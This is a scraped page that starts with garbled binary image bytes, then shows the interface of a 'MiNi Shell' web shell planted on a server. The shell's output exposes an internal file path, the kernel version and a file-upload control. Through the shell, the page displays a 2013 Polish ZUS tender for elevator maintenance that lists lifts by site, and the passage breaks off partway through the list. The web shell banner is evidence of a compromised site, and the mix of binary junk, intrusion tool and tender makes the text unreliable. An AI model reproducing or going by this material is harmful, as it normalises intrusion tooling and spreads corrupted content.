JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/270042-N-2013.html

<p class="kh_header"><b>Warszawa: usługi konserwacji i napraw dźwigów zainstalowanych w I Oddziale, II Oddziale i  III Oddziale Zakładu Ubezpieczeń Społecznych w Warszawie oraz Oddziale ZUS w Siedlcach.</b><br>
<b>Numer ogłoszenia: 270042 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych III Oddział w Warszawie , ul. Czerniakowska 16, 00-701 Warszawa, woj. mazowieckie, tel. 22 890 40 00, faks 22 827 83 75.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi konserwacji i napraw dźwigów zainstalowanych w I Oddziale, II Oddziale i  III Oddziale Zakładu Ubezpieczeń Społecznych w Warszawie oraz Oddziale ZUS w Siedlcach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> usługi konserwacji i napraw dźwigów zainstalowanych w I Oddziale, II Oddziale i  III Oddziale Zakładu Ubezpieczeń Społecznych w Warszawie oraz Oddziale ZUS w Siedlcach.
CZĘŚĆ 1
 I Oddział ZUS w Warszawie:
w okresie 01.01.2014 r. - 31.12.2014 r.
CZĘŚĆ 2
II Oddział ZUS w Warszawie:
w okresie 01.11.2013 r. -  do 31.12.2014 r.
CZĘŚĆ 3
III Oddział ZUS w Warszawie:
w okresie 01.01.2014 r. - 31.12.2014 r.
CZĘŚĆ 4
     Inspektorat ZUS w Żyrardowie:
w okresie 01.01.2014 r. - 31.12.2014 r.
1.5. CZĘŚĆ 5
     Oddział ZUS w Siedlcach:
w okresie 01.01.2014 r. - 31.12.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga zabezpieczenia oferty wadium.
2.	Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości:
Część nr 1  	   1 470,00 zł
Część nr 2 -    	   1 260,00 zł
Część nr 3 - 	      940,00 zł
Część nr 4 - 	      570,00 zł
Część nr 5 - 	      650,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że wykonawca spełnia ten warunek jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał:
minimum 2 usługi /niezależnie od ilości części na które składana jest oferta/ świadczone nieprzerwanie przez okres co najmniej 12 miesięcy, polegające na obsłudze serwisowej /konserwacje/naprawy/ dźwigów osobowych. Wartość każdej usługi winna być nie mniejsza niż: 
dla Części nr 1 		- 48 310,00 zł
dla Części nr 2		- 41 440,00 zł
dla Części nr 3		- 30 840,00 zł
dla Części nr 4		- 18 880,00 zł
dla Części nr 5		- 21 400,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże 1.dysponowanie co najmniej:
dla Części nr 1, 2, 3, 4, 5
  2 osobami /niezależnie od ilości części na które składana jest oferta/  
posiadającymi Zaświadczenia kwalifikacyjne do konserwacji urządzeń związanych z przedmiotem zamówienia, wydane przez organ właściwej jednostki dozoru technicznego na podstawie ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym/Dz.U. z 2000 r. Nr 122 poz. 1321 z późn. zm./
1.2 dysponowania co najmniej:
dla Części nr 1, 2, 3, 4, 5 - 2 osobami /niezależnie od ilości części na które składana jest oferta/  
posiadającymi świadectwo kwalifikacyjne na stanowisku eksploatacji E w zakresie: obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energie elektryczną o napięciu nie wyższym niż 1 kV /zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r., Dz. U. nr 89, poz. 828 ze zm./.   
1.3	dysponowania co najmniej:
dla Części nr 1, 2, 3, 4, 5 - 2 osobami /niezależnie od ilości części na które składana jest oferta/  
posiadającymi świadectwo kwalifikacyjne na stanowisku dozoru D w zakresie: obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energie elektryczną o napięciu nie wyższym niż 1 kV /zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r., Dz. U. nr 89, poz. 828 ze zm./</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi Zamawiający uzna dostawy spełniające warunek wskazany w pkt. III.3.2)
Dowodami są:
 - poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Zamiast poświadczeń, o których mowa powyżej, wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedstawiania ww. dowodów.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Czerniakowska 16 (wejście od ul. Czerniakowskiej, budynek VGB), w Wieloosobowym Stanowisku  Zamówień Publicznych, piętro I, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 10:30, miejsce: siedzibia zamawiającego - ul. Czerniakowska 16 (wejście od ul. Czerniakowskiej, budynek VGB), w Wieloosobowym Stanowisku  Zamówień Publicznych, piętro I, pok. 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> rzedmiotem zamówienia są usługi konserwacji i napraw dźwigów osobowych i towarowych zainstalowanych w obiektach I Oddziału,  ZUS w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1- I Oddział  ZUS w Warszawie:
1. Lokalizacja:

 budynek przy ul. Senatorskiej 6/8 w Warszawie.
Charakterystyka dźwigów:
1.1.  dźwig elektryczny linowy osobowy 
- zainstalowany w budynku nr 4; nr fabr. 046, 
- producent OTIS, rok bud. 1996, 
- udźwig 300 kg, liczba przystanków - 5.
-1 szt

1.2. - dźwig elektryczny linowy osobowy
-  zainstalowany w budynku nr 7; nr fabr. 60198, 
- producent ZJE, rok bud. 1954,
-  udźwig 750 kg, liczba przystanków - 5
- 1 szt.

1.3. - dźwig elektryczny linowy towarowy
-  zainstalowany w budynku nr 7; nr fabr. 55186,
-  producent KDO ZREMB, rok bud. 1988,
-  udźwig 160 kg, liczba przystanków - 3.
- 1 szt.

2. Lokalizacja:

budynek przy ul. Senatorskiej 10 w Warszawie.
Charakterystyka dźwigu:
2.1 dźwig hydrauliczny osobowy zainstalowany w budynku nr 2; nr fabr. 2740/M
- producent (modernizujący) ELEKTRODŹWIG, rok bud. 2007, 
- udźwig 1000 kg, liczba przystanków - 9.
- 1 szt.

3. Lokalizacja:

budynek przy ul. Goleszowskiej 2 w Warszawie:
Charakterystyka dźwigów:

3.1 dźwig hydrauliczny osobowy zainstalowany w budynku wysokim; nr fabr. P00H0113,
- producent PUHP PILAWA ED SERVICE LIFT, rok bud. 2000, 
- udźwig 630 kg, liczba przystanków - 7.
-1 szt.

3.2  dźwig hydrauliczny osobowy zainstalowany w budynku niskim; nr fabr. P00H0114,
-  producent PUHP PILAWA ED SERVICE LIFT, rok bud. 2000,
- udźwig 630 kg, liczba przystanków - 4
- 1szt.

4. Lokalizacja:

budynek przy ul. Kasprowicza 151 w Warszawie:
Charakterystyka dźwigów:
4.1 dźwig elektryczny linowy osobowy nr ew. N3127014342, nr fabr. EXPL72289WP,
-  producent ORONA S. COOP, rok prod. 2007,
- udźwig 630 kg - ilość przystanków 4, 
-1 szt.

4.2  dźwig elektryczny linowy osobowy nr ew. N3127014878, nr fabr. EXPL72290WP, typ  M 33;
-  producent WINDPOL. Sp. z o.o., rok prod. 2007,
- udźwig 630 kg - ilość przystanków 4,
- 1 szt.
 
4.3 urządzenie do przemieszczania osób niepełnosprawnych nr ew. N3027000820, nr fabr. C07G30533, typ SLIM,
-  producent EXTREMA WŁOCHY, rok prod. 2007
- udźwig 225 kg;
- 1szt


5. Lokalizacja:

budynek przy ul. Wrocławskiej 20 w Warszawa:
5.1 dźwig elektryczny linowy osobowy; nr fabr. 55220, producent TRANS LIFT, rok bud. 1993, udźwig 1000 kg, liczba przystanków - 5,
- 1 szt.

5.2 dźwig elektryczny linowy towarowy; nr fabr. 32265,
-  producent DALDOSS ELEVETRONIC S.p.A., rok bud. 1993,
-  udźwig 50 kg, liczba przystanków - 5,
- 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia są usługi konserwacji i napraw dźwigów osobowych i towarowych zainstalowanych w obiektach II Oddziału ZUS w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2  II Oddział ZUS w Warszawie:
       
1.Lokalizacja:
Inspektorat ZUS w Wołominie, ul. Reja 20. 
Charakterystyka dźwigu:
1.1. dźwig osobowy, typ  E02, nr fabryczny 972, nr ewidencyjny N3027000054,
- pionowy o dozorze pełnym,
- udźwig 300 kg, ilość przystanków 3
- wytwórca VIMEC S.R.L., rok budowy 1996.
-1 szt.

2.Lokalizacja:

Inspektorat ZUS w Legionowie, ul. Słowackiego 20. 
Charakterystyka dźwigu:
2.1.  dźwig osobowy, typ  HOE-1000-T/T-N, nr fabryczny 60094, nr ewidencyjny N3127008384,
- pionowy o dozorze pełnym,
- udźwig 1000 kg, ilość przystanków 4
- wytwórca FUD BOLĘCIN, rok budowy 2001.
-1 szt.


3.Lokalizacja:   
 
Inspektorat ZUS w Warszawie, Praga Północ, ul. 11 Listopada 15a. 
Charakterystyka dźwigów:
3.1.  dźwig osobowy, typ  WEO, osobowo-elektryczne, nr fabryczny WEO-06183,  nr ewidencyjny N3127002689 - pionowy o dozorze pełnym,
- udźwig 800 kg, ilość przystanków 6,
- wytwórca WINDA WARSZAWA Sp. z o.o., rok budowy 2006,
-1 szt.

3.2.  dźwig osobowy, typ  WEO, osobowo-elektryczne, nr fabryczny WEO-06184,  nr ewidencyjny N3127002688,
- pionowy o dozorze pełnym,
- udźwig 800 kg, ilość przystanków 6,
- wytwórca WINDA WARSZAWA Sp. z o.o., rok budowy 2006,
-1 szt.

3.3. dźwig towarowy, typ  DTM-100, nr fabryczny PM-312, nr ewidencyjny     N3127008778 
- pionowy o dozorze pełnym,
- udźwig 100 kg, ilość przystanków 3,
- wytwórca POLIFT, rok budowy 1993,
-1 szt.

3.4. dźwig towarowy, typ  DTM-100, nr fabryczny PM-313, nr ewidencyjny     N3127008779,
- pionowy o dozorze pełnym,
- udźwig 100 kg, ilość przystanków 3,
- wytwórca POLIFT, rok budowy 1993,
-1 szt.
 
4. Lokalizacja:

Inspektorat ZUS w Otwocku, ul. Poniatowskiego 17
4.1. dźwig osobowy, hydrauliczny, nr fabryczny14816,
- udźwig 640 kg, ilość przystanków 6,
- wytwórca I.G.V.S.p.A. 20060 Vignate MI, Włochy, rok produkcji 1999,
- 1 szt.

5. Lokalizacja:

siedziba II Oddziału ZUS w Warszawie, ul. Podskarbińska 25
5.1. dźwig osobowy, nr fabryczny HE-0149, nr ewidencyjny 312707458
- udźwig 800 kg, ilość przystanków 6,
- wytwórca HYDROMACH Sp. z o.o.
- 1 szt

5.2. dźwig osobowy, nr fabryczny HE-0148, nr ewidencyjny 312707267
- udźwig 800 kg, ilość przystanków 6,
- wytwórca HYDROMACH Sp. z o.o.
- 1 szt

5.3 urządzenie do przemieszczania osób niepełnosprawnych, nr fabryczny 8718252
- platforma pionowa typ CIBES A 7000
- udźwig 400 kg, ilość przystanków 2
- wytwórca CIBES LIFT AB Szwecja, rok budowy 2010.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia są usługi konserwacji i napraw dźwigów osobowych i towarowych zainstalowanych w obiektach III Oddziału ZUS w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ nr 3 - III Oddział ZUS w Warszawie:
1.	Lokalizacja:

III O/ZUS Warszawa,  ul. Czerniakowska 16:

1.1. dźwig osobowy firmy OTIS w budynku VGB,
-rok produkcji 1989,
-udźwig 1000 kg, ilość przystanków 8
 - 1 szt.,- prawy 

1.2. dźwig osobowy firmy OTIS w budynku VGB,
-rok produkcji 1989, 
-udźwig 1000 kg, ilość przystanków 8
- 1 szt.,- lewy

1.3. dźwig towarowy firmy OTIS w budynku VGB,
-rok produkcji 1989,
- udźwig 200 kg, ilość przystanków 2
- 1 szt., 

1.4. dźwig osobowy firmy TRANSLIFT w budynku Lipsk,
-rok produkcji 1994, 
-udźwig 1000 kg, ilość przystanków 7
 - 1 szt. 

1.5. dźwig osobowy firmy TRANSLIFT w budynku Lipsk,
-rok produkcji 1994, 
-udźwig 1000 kg, ilość przystanków 7
- 1 szt.

1.6. dźwig osobowy firmy Pilawa w budynku technologicznym,
-rok produkcji 1998, 
-udźwig 1000 kg, ilość przystanków 3
 - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia są usługi konserwacji i napraw dźwigów osobowych i towarowych zainstalowanych w obiektach III Oddziału ZUS w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ nr 4 - Inspektorat ZUS w Żyrardowie

1.	Lokalizacja:

Inspektorat ZUS w Żyrardowie, ul. Bankowa 1 / ul. Cicha2/8:
1.1. dźwig osobowy firmy HYDROMACH Sp. z o.o. w budynku przy ul. Cichej 2/8,
-rok produkcji 1998, 
-udźwig 800 kg, ilość przystanków 5
 - 1 szt. 

1.2. dźwig osobowy firmy HYDROMACH w budynku przy ul. Cichej 2/8,
-rok produkcji 1998, 
-udźwig 800 kg, ilość przystanków 5
- 1 szt.

1.3. platforma do przewozu osób niepełnosprawnych firmy KALEA w budynku przy ul. Cichej 2/8.
-rok produkcji 1998, 
-udźwig 300 kg, ilość przystanków 2
- 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem zamówienia są usługi konserwacji i napraw dźwigów osobowych i towarowych zainstalowanych w obiektach Oddziału ZUS w Siedlcach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ nr 5 - Oddział ZUS w Siedlcach:
1.	Lokalizacja:

